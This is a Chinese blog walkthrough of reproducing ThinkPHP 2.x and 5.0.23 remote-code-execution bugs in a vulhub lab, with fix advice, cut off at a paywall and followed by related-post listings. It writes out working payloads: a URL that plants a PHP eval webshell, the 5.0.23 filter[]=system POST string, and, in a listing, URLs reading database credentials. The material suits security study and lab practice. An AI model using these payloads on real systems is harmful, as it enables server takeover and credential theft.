【vulhub】thinkphp漏洞系列

原创 已于 2025-09-05 15:39:46 修改 · 652 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#vulhub靶场

于 2025-09-03 12:35:37 首次发布

【vulhub】thinkphp漏洞系列

ThinkPHP是什么

ThinkPHP是一款免费开源、快速、简单且面向对象的轻量级PHP开发框架。它遵循MVC设计模式,内置了全功能ORM、模板引擎、路由、缓存、验证器等丰富组件,极大地简化了数据库操作和Web开发流程。ThinkPHP尤其适合快速构建中小型企业网站、API接口和后台管理系统,拥有庞大的开发者社区和丰富的学习资源。

一、2-rce 远程代码执行漏洞
1. 漏洞描述

ThinkPHP 2.x版本的RCE漏洞主要源于其路由匹配机制中对用户输入的不当处理。具体来说,该框架在使用preg_replace的/e模式匹配路由时,未对用户输入参数进行充分过滤,导致输入参数被直接插入双引号中执行,从而引发任意代码执行漏洞。

漏洞原理: ThinkPHP 2.x在处理路由时,通过preg_replace函数的/e模式进行正则匹配,用户输入的参数可能被直接注入到代码执行上下文中,导致攻击者可构造恶意输入执行任意代码。

preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)
如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞。

影响范围: 主要影响ThinkPHP 2.x版本,部分3.0版本(如Lite模式)因未修复该问题也可能受影响。

2. 环境启动

cd vulhub-master/thinkphp/2-rce # 进入vulhub靶场文件目录
service docker start # 启动docker
sudo docker-compose up -d # 启动靶场服务
sudo docker ps -a # 查看服务状态

image

环境启动后,浏览器访问靶场,http://127.0.0.1:8080/ 或者 http://[ip]:8080/image

3. 漏洞验证与利用

构造payload:http://127.0.0.1:8080/?s=/Index/index/a/${@phpinfo()}image

写入一句话木马:

http://127.0.0.1:8080/?s=/Index/index/a/${@print(eval($_POST[cmd]))}

蚁剑连接:image

连接成功,添加数据:image

练习结束记得关闭靶场,避免端口被占用的情况sudo docker-compose down

二、5.0.23-rce 远程代码执行漏洞
1. 漏洞描述

漏洞原理:
由于框架对控制器名和请求方法的处理存在缺陷,攻击者可通过精心构造的URL或POST请求,绕过安全检测,调用框架内部的敏感函数(如system),从而执行任意PHP代码。

影响版本:
ThinkPHP 5.0系列 <= 5.0.23。

漏洞复现方法:

  • 访问目标站点的/index.php?s=captcha路径,若出现报错页面,表明可能存在漏洞。
  • 使用工具(如Burp Suite、Hackbar)发送POST请求,构造Payload:
    _method=__construct&filter[]=system&method=get&server[request_method]=<命令>
    (例如whoamiid等系统命令)。
  • 若成功执行命令,可进一步上传WebShell(需对代码进行Base64编码绕过过滤),实现对服务器的完全控制。

修复建议:

  • 升级ThinkPHP框架至5.0.24及以上版本。
  • 严格限制用户输入,加强服务器安全配置。
  • 定期进行安全扫描和漏洞检测。
2. 环境启动

cd vulhub-master/thinkphp/5.0.23-rce # 进入vulhub靶场文件目录
service docker start # 启动docker
sudo docker-compose up -d # 启动靶场服务
sudo docker ps -a # 查看服务状态

image

环境启动后,浏览器访问靶场,http://127.0.0.1:8080/ 或者 http://[ip]:8080/image

3. 漏洞验证与利用

http:

最低0.47元/天 解锁文章
Lovely_18
关注
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2903
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
qq_53409748的博客
03-16 406
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
ThinkPHP漏洞总结(利用)
热门推荐
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
thinkphp漏洞集合
weixin_34113237的博客
06-01 3401
整合了一个集合,方便查询 thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwor...
漏洞复现】vulhub php文件包含漏洞
m0_53223419的博客
03-04 417
利用脚本exp.py实现了上述过程,成功包含临时文件后,会执行,写入一个新的文件/tmp/g,这个文件就会永久留在目标机器上。访问http://IP:8080/lfi.php,使用GET方法传输参数
vulhub php文件包含漏洞复现
weixin_53730939的博客
03-04 480
vulhub php文件包含漏洞复现过程
13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)
易编橙 · 终身成长社群,相遇已是上上签!
10-22 934
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 3178
0x01 复现环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞复现 主机发现&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发现靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口;-v:显示扫描过
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 944
vulhub thinkphp5 5.0.23 远程代码执行漏洞
Vulhub/thinkphp漏洞复现
qq_45230030的博客
12-28 714
vulhub靶场thinkphp漏洞复现
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 4697
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
Thinkphp漏洞
weixin_43873557的博客
02-06 1177
Thinkphp介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持 windows/Unix/Linux等服务器环境。 ➢ Thinkphp应用 很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。 ➢历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 Thin
【复现vulhub php文件包含漏洞
m0_71635484的博客
03-05 395
【复现vulhub php文件包含漏洞
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 1万+
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPHP漏洞大全
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
vulhub命令执行/代码执行漏洞
m0_73771249的博客
09-08 577
1.打开靶场环境2、访问网页3、构造payload4、写入一句话木马,使用蚁剑连接。
Thinkphp漏洞总结
qq_44640313的博客
11-02 1060
ThinkPHP框架漏洞知识总结
从0起步学习网络安全(学习篇):DAY11 Web中间件漏洞ThinkPHP漏洞
最新发布
Jiangbe-Boating
09-15 873
ThinkPHP是国内最流行的PHP框架之一,但存在多种高危漏洞,包括RCE、敏感信息泄露和本地文件包含等。文章介绍了框架特征识别方法,并详细复现了5.x RCE漏洞、敏感信息泄露漏洞和多语言文件包含漏洞的利用过程。针对这些漏洞,建议及时更新框架版本、加强代码审查、严格访问控制并定期进行安全检测。尽管官方已发布修复补丁,但仍有大量未更新系统面临风险。文章提供了完整的安全分析思路和修复方案,帮助开发者和运维人员提升系统安全性。
vulhub thinkphp几个漏洞
02-12
#### VulHub上的ThinkPHP漏洞列表及详情 ##### 1. ThinkPHP 5.0.23 RCE漏洞漏洞允许攻击者通过精心构造的HTTP请求来执行任意PHP代码。该漏洞影响范围广泛,涉及ThinkPHP 5.0系列直至5.0.23版本。利用方式通常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值